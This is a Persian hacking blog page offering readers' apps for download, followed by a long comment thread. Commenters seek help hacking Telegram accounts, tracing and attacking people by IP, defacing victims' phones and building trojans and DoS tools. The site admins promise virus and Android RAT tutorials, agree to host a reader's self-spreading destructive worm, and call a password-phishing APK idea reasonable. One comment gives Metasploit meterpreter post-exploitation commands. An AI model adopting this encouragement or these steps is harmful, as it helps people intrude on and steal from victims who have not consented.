پروژه های دوستان :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۲ مرداد ۰۲، ۰۰:۳۴ - Sami
    مرسی
  • ۱۴ مرداد ۰۲، ۱۴:۴۶ - farhad
    salam
در این پست طراحی ها و پروژه های کاربران و دوستانی که در این وب همیشه همراه ما بودن رو قرار میدیم :)
شما هم میتونید برنامه ها و یا طراحی های خودتون رو در این پست با ما به اشتراک بزارید


نرم افزار گلچینی از مطالب سایت برای اندروید
برنامه نویس :
silent_wolf
فرمت :
apk

دریافت
حجم: 695 کیلوبایت

نرم افزار کد ملی برای سیستم
برنامه نویس :
Cloner.SEM
فرمت :
exe

دریافت
حجم: 1.61 مگابایت

گلچینی از مطالب هک و امنیت
برنامه نویس :
Silent_wolf
فرمت :
apk

دریافت
حجم: 4.15 مگابایت




نظر (۴۴)

سلام حاجی
کجایی نیستی ؟
اینجا ترکیده بود چرا ؟
یاهو پیام دادم جواب ندادی کلفت شدی ؟ چی شده ؟
این طوری نبودیا
مال منو نمیزاری اینجا ؟
یعنی به درد اینجا هم نمیخوره ؟
Virus32 Virus 32 :
سلام رفیق
بخدا خیلی گیر بودم
سیستمم رو از دست دادم الان با سیستم اینو اون میام میرم
نمیتونم به همه اکانتم دسترسی داشته باشم
فایل هایی که ارسال کرده بودی رو ندارم دیگه دوباره ارسال کن برام
راستی عکست کو ؟
همین که من دزدیدمش
خوشکل بود چرا برداشتی ؟
Virus32 Virus 32 :
درستش کردم :)
مطالب زیادی در مورد برنامه نویسی بگذارید
Virus32 Virus 32 :
اوکی :)
سلام ویروس جان خسته نباشی
من مشکلی داشتم تو قسمت port forwarding
آخه تو یه وبلاگی آموزش ساخت رات گذاشته بود بعد گفته بود برید تو پرت فور واردینگ قسمت پورت رنج و اینا
بعد من که رفتم پورت فورواردینگ اصلا چیزی به نام پورت رنج ندیدم
چی کار کنم ؟؟
ممنون
Virus32 Virus 32 :
بجای پورت رنج نوشته
start port
end port
این دوتا گزینه رنج پورت رو تشکیل میدن !!!
بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
و مشکل دیگه ای که داشتم اینه که وقتی تو cmd دستور ipconfing رو میزنم برام اینو میاره :
'ipconfing' is not recognized as an internal or external command,
operable program or batch file.
و در مورد اون مشکل قبلیم اینم یه عکس از قسمت :

porthttp:/************files/g6f_capture.png forwarding
Virus32 Virus 32 :
سلام دستور رو اشتباه وارد کردی
ipconfig
یه n اضافه گذاشتی
سلام ویروس خوبی اگه میشه کد قالب وبلاگت رو واسه لوکس بلاگ درس کن بزار احتیاج دارم ممنون
Virus32 Virus 32 :
o_O
ببخشید امروه هک تلگرام سوشا و لادن تیتر خبر های هک بود صاحب تلگرام باسه هر کی که تلگرام رو هک کنه جایزه خوبی میده
این روزام اگه توgoogleسرچ کنی هک تلگرام مهندس اجتماعیی میده دستت
این دو نفرم که اولاغ نیستن که رمز رو به همین راحتی بدن
خوب تلگرام اینا چه جوری هک شده؟
Virus32 Virus 32 :
نمیدونم
slm virus chetori..
ye moshkel daram ye lap top daram model dell wostro 100 ke ro baus ramz dare har kari ham kardam baz nashod...tarafand haye to site ha ro ham emtehan kardam nashod.narm afzari chizi nadari bazesh konam
Virus32 Virus 32 :
سلام عزیز
نه متاسفانه ندارم
درود و خسته نباشی
داداش در port forwarding در مودم های الفکس چجوری باید عمل کرد
ممنون میشم کمک کنی
Virus32 Virus 32 :
سلام ممنون
نمیدونم
سلام ویروس جان.بعد چند مدت اومدم دیدم این برنامه هارو گذاشتی.خیلی خوشحالم ک تونستم کمکی بهت بکنم.یه چند تا از مطالب کم یاب هک اندروید میخوام برنامه نویسی کنم به اسم وبلاگت میدم بهت امیدوارم بدرد بخوره.مطالبت هم عالیه خیلی کمک کرد
Virus32 Virus 32 :
سلام
ممنون عزیز
بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
سلام
ویروس جان
اینم برنامه ای که قولشو تو نظر قبلی دادم.به اسم سایت دادم بیرون.امیدوارم کار امد باشه.
ترفند های کمیاب اندروید
http://ww**********************************083ce5c9e19d691fe7b/silent_wolf.apk.html
Virus32 Virus 32 :
سلام رفیق
این برنامه رو هم بزودی قرار میدم
بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
****** ** *** ******* ***** ***** **** ** ****** ** * **** ***** **** **
Virus32 Virus 32 :
از چی ناراحتی؟
زنده باد ویروس 32
Virus32 Virus 32 :
;)
سلام ویروس جان خسته نباشی اگه میشه راه های بدست آوردن آی پی مثلا هنگام چت البته به غیر از ipconfig چون کار نمی کنه یا اگه کار می کنه لطفا آموزش تصویریشو بزار یا هر راه که هست
و آموزش هک از طریق آی پی و مک آدرس ;)
Virus32 Virus 32 :
سلام عزیز
این آموزش ها رو قبلا قرار داده بودم ولی فتا به اینجور آموزشها خیلی گیر میده
netstat -an
میشه واسم آموزش بدست آوردن آی \ی هنگام چت و هکش رو به به جیمیلم بفرستی ؟

amirmani78@gmail.com
Virus32 Virus 32 :
فعلا نمیتونم اون آموزش رو بفرستم داشی
یبار نوشتم بهم گیر دادن
الانم که اوضاع زیر خط حبسه :)
سلام داداش آموزش شماره مجازی رو بدید که تو تلگرام ریپورت نشه فدا فدا
Virus32 Virus 32 :
سلام
باشه
سلام داداش ویروس مطالبت عالیه خیلی استفاده کردم ازشون دمت گرم
میخواستم بپرسم روشی برای هک تلگرام یا هک ممبر تلگرام هست ؟
میتونی اموزششو بزاری
ممنون
Virus32 Virus 32 :
سلام عزیز
بخدا نمیدونم :(
رمز عبور
سلام داش
اگه ممکنه مطالب جدید تر و زود تر و با کیفیتر تر و خطر ناک تر بزار ممنون میشم
Virus32 LORD 32 LORD 32 :
اوکی میزارم. فقط موندم خطرناک این وسط چی میگه :)
اون چرا
سلام داداش
مسیر استارت آپ در اندروید کجاست؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
خیلی استراریه
چاکرم
Virus32 Virus 32 :
سلام داشی
راستش از اندروید هنوز زیاد سردرنمیارم
فکر کنم برای اندروید ابتدا باید پرومیس هارو دستکاری کنی و بعد تو آدرس زیر دستور فعال شدن برنامه رو بدی
دقیق نمیدونم :(
android.intent.action.BOOT_COMPLETED
چاکرتم ویروس جان
خیلی گلی
مننننننننننون
Virus32 Virus 32 :
فدا مدا 😉
سلام ویروس جان
اگه وقتشو داشتی آموزش ساخت دیفیس برا اندرویدم بزار
چاکرتم استتتتتتاد
Virus32 LORD 32 LORD 32 :
این روزا درگیریم وقت کنم میزارم داداش :)
سلام ویروس جان
همئن مزاحم همیشگیم
اگه امکانش هست لطفا چند تا منبع معرفی کن برا همین مسیر استارت آپ
چاکرتم
فدات :)
Virus32 Virus 32 :
سلام داداش
مراحمی 😉
چجور منبعی؟ استارت آپ ها که بحث پیچیده ای نیست
من فقط می خام یه گوشی رو دیفیس کنم و دیفیس رو تو استارت آپ قرار بدم
اگه منبعی داری کهآموزش این کارو میده ممنون میشم اگه بزاری
خیلی گلی ویروس جان
فدات
Virus32 Apk 32 :
 به زودی براتون بخش ویروس نویسی و رات های اندرویدی رو هم میزاریم :)
ولی اگه به قربانی دسترسی داری میتونی با برنامه ی Startup Manager برنامه ی مورد نظرتو به استارت آپ گوشی انتقال بدی.

سلام Apk 32 جان
اگه بزاری ممنون میشم
من به گوشی طرف دسترسی ندارم و می خام با ارسال برنامه ویروسی گوشی رو دیفیس کنم
Virus32 Apk 32 :
سلام. بحث ویروس نویسی جداس که در آینده میزاریم و بتونیم بدون دسترسی یه بلاهایی سر گوشی بیاریم.
سلام داداشی . من یه ویروس نوشتم با ویژوال بیسیک.این ویروس اول خودشو تو استارت اپ کپی می کنه و بعدا خودشو تو تمامی درایو ها و فلش هایی که به سیستم وصلن کپی می کنه و بعدا کل دسکتاب رو می گیره و مینویسه Fuck by virus32و در نهایت کامپیوترو خاموش می کنه . (تقریبا همون ویروس بلاستر) اگه اجازه بدی می خواستم تو وبلاگت بزاریش
Virus32 DęЯǞqΦЦlǞ .. :
سلام
لینک دانلود ویروس رو ارسال کن تو وب قرار میدم
سلام داداش ویروس پیش از هر چیزی می خوام بگم خیلی گلی. واقعا وبلاگت خیلی عالیه و حرف نداره . مرسی واسه تمام زحماتت
داداش من یه برنامه نوشتم با ویژوال بیسیک کلمات و جملات اینگلیسی وارد می کنی تنلظشو می شنوی یه چیزی تو مایه های همون پستت که فک کنم اسمش شنیدن صدای سیستم بود. شاید برای دوستانی که اینگلیسی می خوان یاد بگیرن جالب باشه . اگه صلاح دیدی بزارش اینم لینکش
http://uplod.ir/r1a1esiyfqzb/dssdadadsa.exe.htm
Virus32 DęЯǞqΦЦlǞ .. :
سلام ممنون عزیز
سلام داداش APK
یه سوال داشتم . می خواستم بدونم روی اندروید میشه ویندوز نصب کرد ؟؟
و آیا بعدا برای دستگاه مشکلی پیش نمی یاد؟؟؟؟؟؟؟؟؟؟؟؟؟
Virus32 DęЯǞqΦЦlǞ .. :
بله میشه نصب کرد ویندوز 8 یکی از دوستام قبلا نصب کرده بود

سلام،ی سوال توی نرم افزار دوستمون سایلنت ولف
ه،ک درگاه بانکی بود میتونم بپرسم ایا استفاده ازش میتونه برام دردسر ساز شه؟؟
Virus32 Virus 32 :
سلام
نه
سلام ببخشید میشه اموزش ساخت تروجان وحمله های DOSرو بزارید یه چیزایی بلدم میخوام بیشتر بدونم ممنون
Virus32 MR_C0D3R ‌ :
ساخت تروجان رو بعد ها آموزششو به چند زبان مختلف قرار میدم ، فقط صبر داشته باشین
برای حملات داس و دی داس هم مطالب + برنامه های زیادی قرار داده شده که میتونی از اونها استفاده کنی ، فقط کافیه یه دور تو وب بزنی
وقتی از یک اندروید یا ویندوز دسترسی meterpreter گرفتی با metasploit تو ویندوز



اول بنویس
background



بعد

use post/multi/manage/set_wallpaper
set session 1
بجای 1 اون session که background گرفتی بنویس مثلا 2 یا 3
بعدش ادرس یک عکسو بدید
set wallpaper_file c:\users\images.png

بعد


exploit

بعد میبینید صفحه background به اون عکسی که میخواهید تغییر کرده است


راستی چجوری وقتی دسترسی meterpreter دارم یک apk رو target نصب کنم

فکر کنم با استفاده از xss بشه




سلام من میتونم fishing با یک apk انجام دهم یعنی apk رو بگم بره تو یک service apache که من تو هاست گذاشتم و بگه به استفاده کننده از app

لطفا رمز فلان رو وارد کنید بعد از طریق php اطلاعات رو بره تو database سیو کنه بعد واسه من بفرسه بعد من victim رو میترکونم
این application رو به عنوان تروجان اگه میشه تو پست ساخت trojan اندروید قرار دهید .


البته خودم تلاش دارم ولی تنها نمیتونم .


با تشکر
مرسی از جوابتون :D

شب بخیر
نظرت درباره message بالا چیه یعنی هیچی😂😂😂😂😂😂😂😂
قشنگ رو اعصابت راه رفتم
معذرت
Virus32 MR_C0D3R ‌ :
نه رو اعصابم نرفتی
من یه خرده وقتم کمه
یه چند روزیه وقتم آزاده میخوام روی یه چیزی کار کنم
اما حجم کامنتا زیاده بخاطر همین تا میام جواب بدم و ... وقت میگذره
مجبورم همینجوری تاییدشون کنم و به بعضیاش که همون لحظه میتونم جواب بدم ، جواب بدم
ولی اینجوری هم کامنتی نمیمونه و هم کار بعضیا راه میفته (مخصوصا خودم :) )
ایده ی اونقدر چرت و پرتی هم نیس ، ،phising با یک application
Virus32 MR_C0D3R ‌ :
بله
توی پست تروجان نویسی اندروید هم گفته بودم
سلام داداش چرا پست تروجان نویسی برای اندروید رو برداشتی


فتاح گیر داد
زبان اندروید رو کار کردی
پیشنهاد میکنم اندروید رو کار کن چون الان من هر کیو میبینم با گوشی کار میکنه و کمتر کسی دیدم لپ تاپ کار کنه

من با اندروید استادیو مینویسم ide خیلی خوبیه
Virus32 MR_C0D3R ‌ :
اون برای اندروید با جاواست
من اندروید با بیسیک رو کار میکنم
سلام
ببین داداش رو ویندوز 10 نمیشه با اون روشی که گفتی پسورد وای فای رو بدست اورد


راستی از کجا فهمیدی من 10 دارم با
Ip یا هکم کردی با javascript تو سایتت یا با یک فایلی 😝😖😫😫😫😫😫
Virus32 MR_C0D3R ‌ :
قبلا دنبال آموزش بای پس UAC بودی
به به چه حافظه ای
بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
***** **** ** * *** **** ** *** ****** ****** **** **** ** ***** *** *** **** ****** **
Virus32 MR_C0D3R ‌ :
صداشو در نیار D:
صدای چیو در نیاره

درباره چیه
بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
**************************************************************

**
Virus32 MR_C0D3R ‌ :
Wtf ؟
  • Virus32
  • محمد صدرا عبدالعلی زاده
  • سلام.

    منم برنامه بدرد بخور بدم میتونید بزارید

    بچه ی خوبیم (:

    Virus32 Virus 32 :
    سلام
    بله
    چرا که نه
  • Virus32
  • محمد صدرا عبدالعلی زاده
  • فقط برنامه های حرفه ای قبوله یا ساده باشه هم میزارین

    Virus32 Virus 32 :
    فرقی نداره
    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی